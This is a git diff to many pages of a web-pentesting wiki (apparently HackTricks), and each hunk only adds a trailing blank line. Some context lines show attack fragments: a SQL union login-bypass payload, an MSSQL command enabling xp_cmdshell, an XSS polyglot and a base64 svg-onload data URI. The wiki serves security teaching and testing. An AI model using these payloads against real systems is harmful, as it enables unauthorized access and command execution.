diff --git a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index 79c39a184..02cd69036 100644
--- a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -201,3 +201,4 @@ Make your payload execute something like the following:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
index 194528f9c..5f80ff684 100644
--- a/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
+++ b/src/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
@@ -8,3 +8,4 @@ Check the posts:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
index 7027838a9..1defde4cd 100644
--- a/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
+++ b/src/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -231,3 +231,4 @@ You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java-
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
index 6d89c9054..95b74ca3a 100644
--- a/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/src/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@@ -462,3 +462,4 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index 48d84ef64..6bf26f494 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -394,3 +394,4 @@ To reduce the risk of prototype pollution, the strategies listed below can be em
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index 452948838..9e615ad18 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -116,3 +116,4 @@ Check this writeup: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challe
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index bcbb96166..bd1afc636 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -127,3 +127,4 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
index 47f506645..e9f178d1b 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@@ -731,3 +731,4 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
index b535db342..eb57e7e6e 100644
--- a/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
+++ b/src/pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
@@ -70,3 +70,4 @@ I needed to **call this deserialization twice**. In my testing, the first time t
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/python-yaml-deserialization.md b/src/pentesting-web/deserialization/python-yaml-deserialization.md
index be7081043..a3df314ca 100644
--- a/src/pentesting-web/deserialization/python-yaml-deserialization.md
+++ b/src/pentesting-web/deserialization/python-yaml-deserialization.md
@@ -157,3 +157,4 @@ cat /tmp/example_yaml
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/ruby-_json-pollution.md b/src/pentesting-web/deserialization/ruby-_json-pollution.md
index 9e5b8faaf..d8a134433 100644
--- a/src/pentesting-web/deserialization/ruby-_json-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-_json-pollution.md
@@ -24,3 +24,4 @@ When sending in a body some values not hashabled like an array they will be adde
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/deserialization/ruby-class-pollution.md b/src/pentesting-web/deserialization/ruby-class-pollution.md
index 8d7e844e8..b582d8115 100644
--- a/src/pentesting-web/deserialization/ruby-class-pollution.md
+++ b/src/pentesting-web/deserialization/ruby-class-pollution.md
@@ -419,3 +419,4 @@ It's possible to brute-force the defined classes and at some point poison the cl
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index 39b2db9ed..e9cb95f94 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -691,3 +691,4 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
index 27078bbf8..c80079246 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
@@ -43,3 +43,4 @@ For more information check the description of the Race Condition and the CTF in
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
index a69dde950..01d1be7c6 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-eternal-waiting.md
@@ -101,3 +101,4 @@ It looks like by default Nginx supports **512 parallel connections** at the same
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
index 3cbed0dc3..cb59c86de 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md
@@ -54,3 +54,4 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\
 ```
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
index 005ef9138..9e1520284 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-php-filters.md
@@ -265,3 +265,4 @@ function find_vals($init_val) {
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
index ff2a3b05e..3b9ce92af 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-phpinfo.md
@@ -59,3 +59,4 @@ print('[x] Something went wrong, please try again')
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index b04b6c915..beca991ff 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -64,3 +64,4 @@ if __name__ == "__main__":
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
index 5bfc48429..1a91bb3d4 100644
--- a/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
+++ b/src/pentesting-web/file-inclusion/lfi2rce-via-temp-file-uploads.md
@@ -34,3 +34,4 @@ For GNU/Linux systems, the randomness in temporary file naming is robust, render
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/phar-deserialization.md b/src/pentesting-web/file-inclusion/phar-deserialization.md
index 0988d641f..dd45a5d7b 100644
--- a/src/pentesting-web/file-inclusion/phar-deserialization.md
+++ b/src/pentesting-web/file-inclusion/phar-deserialization.md
@@ -76,3 +76,4 @@ php vuln.php
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index 926ca982f..9f24262ab 100644
--- a/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/src/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -39,3 +39,4 @@ Another writeup in [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-l
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index 1d8f09bac..c313ba80c 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -329,3 +329,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md b/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
index 50bde7be8..538e41046 100644
--- a/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
+++ b/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md
index 4887b4b90..153c713ec 100644
--- a/src/pentesting-web/hacking-with-cookies/README.md
+++ b/src/pentesting-web/hacking-with-cookies/README.md
@@ -300,3 +300,4 @@ There should be a pattern (with the size of a used block). So, knowing how are a
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
index a7e157652..bc05f3864 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-bomb.md
@@ -9,3 +9,4 @@ And for more information, you can check this presentation: [https://speakerdeck.
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
index 8b39916a9..332ae966c 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
@@ -24,3 +24,4 @@ Notice, that third party cookies pointing to a different domain won't be overwri
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
index 176184e82..7f1731026 100644
--- a/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
+++ b/src/pentesting-web/hacking-with-cookies/cookie-tossing.md
@@ -67,3 +67,4 @@ cookie-bomb.md
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/http-connection-request-smuggling.md b/src/pentesting-web/http-connection-request-smuggling.md
index 014ed1195..0a92907a9 100644
--- a/src/pentesting-web/http-connection-request-smuggling.md
+++ b/src/pentesting-web/http-connection-request-smuggling.md
@@ -38,3 +38,4 @@ This issue can potentially be combined with [Host header attacks](https://portsw
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index 3f5b5170d..2e5958c58 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -762,3 +762,4 @@ def handleResponse(req, interesting):
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
index aaf6b83c4..62523af89 100644
--- a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index b66a27552..5db952914 100644
--- a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -7,3 +7,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/http-response-smuggling-desync.md b/src/pentesting-web/http-response-smuggling-desync.md
index d1a61d0c2..65eaa34a7 100644
--- a/src/pentesting-web/http-response-smuggling-desync.md
+++ b/src/pentesting-web/http-response-smuggling-desync.md
@@ -132,3 +132,4 @@ Therefore, the **next request of the second victim** will be **receiving** as **
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md
index 0a419e214..3fbd56fa5 100644
--- a/src/pentesting-web/idor.md
+++ b/src/pentesting-web/idor.md
@@ -5,3 +5,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/iframe-traps.md b/src/pentesting-web/iframe-traps.md
index 9cc5f49c3..f9debd10e 100644
--- a/src/pentesting-web/iframe-traps.md
+++ b/src/pentesting-web/iframe-traps.md
@@ -23,3 +23,4 @@ Ofc, the main limitations are that a **victim closing the tab or putting another
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md
index f13185bee..cd74a92e1 100644
--- a/src/pentesting-web/ldap-injection.md
+++ b/src/pentesting-web/ldap-injection.md
@@ -222,3 +222,4 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md
index 6ac44f913..00e7a14a9 100644
--- a/src/pentesting-web/login-bypass/README.md
+++ b/src/pentesting-web/login-bypass/README.md
@@ -99,3 +99,4 @@ Pages usually redirects users after login, check if you can alter that redirect
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/login-bypass/sql-login-bypass.md b/src/pentesting-web/login-bypass/sql-login-bypass.md
index 0a3f51951..bbca02d0d 100644
--- a/src/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/src/pentesting-web/login-bypass/sql-login-bypass.md
@@ -816,3 +816,4 @@ Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index 6e4caa783..a4e634c5c 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -257,3 +257,4 @@ for u in get_usernames(""):
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md
index dbfffe72d..34a0c2763 100644
--- a/src/pentesting-web/oauth-to-account-takeover.md
+++ b/src/pentesting-web/oauth-to-account-takeover.md
@@ -235,3 +235,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index 98e12cd06..eac68ee3e 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -187,3 +187,4 @@ exit;
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/orm-injection.md b/src/pentesting-web/orm-injection.md
index 29e7eebd9..dc48cb031 100644
--- a/src/pentesting-web/orm-injection.md
+++ b/src/pentesting-web/orm-injection.md
@@ -333,3 +333,4 @@ By brute-forcing and potentially relationships it was possible to leak more data
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/parameter-pollution.md b/src/pentesting-web/parameter-pollution.md
index 567b62fd9..e20768b7e 100644
--- a/src/pentesting-web/parameter-pollution.md
+++ b/src/pentesting-web/parameter-pollution.md
@@ -229,3 +229,4 @@ Which might create inconsistences
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/phone-number-injections.md b/src/pentesting-web/phone-number-injections.md
index 0943f27f3..fd00f50b1 100644
--- a/src/pentesting-web/phone-number-injections.md
+++ b/src/pentesting-web/phone-number-injections.md
@@ -19,3 +19,4 @@ It's possible to **add strings at the end the phone number** that could be used
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
index 9792b8a32..f7deee1f7 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md
@@ -245,3 +245,4 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
index 8ba89ec81..bd44abc88 100644
--- a/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
+++ b/src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
@@ -45,3 +45,4 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md
index 57ca80ef0..7b9ee22c2 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/README.md
@@ -239,3 +239,4 @@ For **more information**:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
index 7aaf7d391..63d6e7925 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md
@@ -34,3 +34,4 @@ And in order to be precise and **send** that **postmessage** just **after** the
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
index 717b67fe3..c0d3150b5 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md
@@ -76,3 +76,4 @@ That **payload** will get the **identifier** and send a **XSS** it **back to the
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
index cc5cde887..e1160ba3d 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
@@ -86,3 +86,4 @@ The final solution by [**@terjanq**](https://twitter.com/terjanq) is the [**foll
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
index 029565858..c54a425de 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
@@ -33,3 +33,4 @@ This is specially useful in **postMessages** because if a page is sending sensit
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index cc089571e..62ffec5fb 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -228,3 +228,4 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md
index 46abd5618..9933e4aff 100644
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@@ -396,3 +396,4 @@ In [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md
index c2de51028..0d808f5eb 100644
--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -57,3 +57,4 @@ Note that even if a rate limit is in place you should try to see if the response
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md
index 8772d46e4..677b570df 100644
--- a/src/pentesting-web/registration-vulnerabilities.md
+++ b/src/pentesting-web/registration-vulnerabilities.md
@@ -182,3 +182,4 @@ hacking-jwt-json-web-tokens.md
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index 2d9e1a55c..21675cc90 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -82,3 +82,4 @@ Regexp (a+)*$ took 723 milliseconds.
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index 214b615a4..1c65f86ab 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -189,3 +189,4 @@ uuid-insecurities.md
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index c86573460..c04f94724 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -83,3 +83,4 @@ Prevention information are documented into the [HTML5 Cheat Sheet](https://cheat
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md
index d7008fce2..e80a7996d 100644
--- a/src/pentesting-web/saml-attacks/README.md
+++ b/src/pentesting-web/saml-attacks/README.md
@@ -306,3 +306,4 @@ with open("/home/fady/uberSAMLOIDAUTH") as urlList:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index db8d49daf..faa2ce5f2 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -167,3 +167,4 @@ In conclusion, XML Signatures provide flexible ways to secure XML documents, wit
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index b9fa86270..2fdfdf809 100644
--- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -246,3 +246,4 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 1036fdea5..4a77964ae 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -548,3 +548,4 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/cypher-injection-neo4j.md b/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
index 324d73b87..e1ece8ce6 100644
--- a/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
+++ b/src/pentesting-web/sql-injection/cypher-injection-neo4j.md
@@ -10,3 +10,4 @@ Check the following blogs:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 9ca2d8c56..c44e6b564 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -195,3 +195,4 @@ Where **name\[i] is a .mdb filename** and **realTable is an existent table** wit
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md
index 04f1010cc..f700872c7 100644
--- a/src/pentesting-web/sql-injection/mssql-injection.md
+++ b/src/pentesting-web/sql-injection/mssql-injection.md
@@ -272,3 +272,4 @@ exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index e29bb269d..b22dcd227 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -184,3 +184,4 @@ mysql> select version();
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
index 58f2867b1..0c8d779ae 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md
@@ -29,3 +29,4 @@ Automation of these processes can be facilitated by tools such as SQLMap, which
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/oracle-injection.md b/src/pentesting-web/sql-injection/oracle-injection.md
index 4078084cd..a2ab58517 100644
--- a/src/pentesting-web/sql-injection/oracle-injection.md
+++ b/src/pentesting-web/sql-injection/oracle-injection.md
@@ -161,3 +161,4 @@ Another package I have used in the past with varied success is the [`GETCLOB()`
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index 1d5e517cb..5ad3537f9 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -91,3 +91,4 @@ SELECT $TAG$hacktricks$TAG$;
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
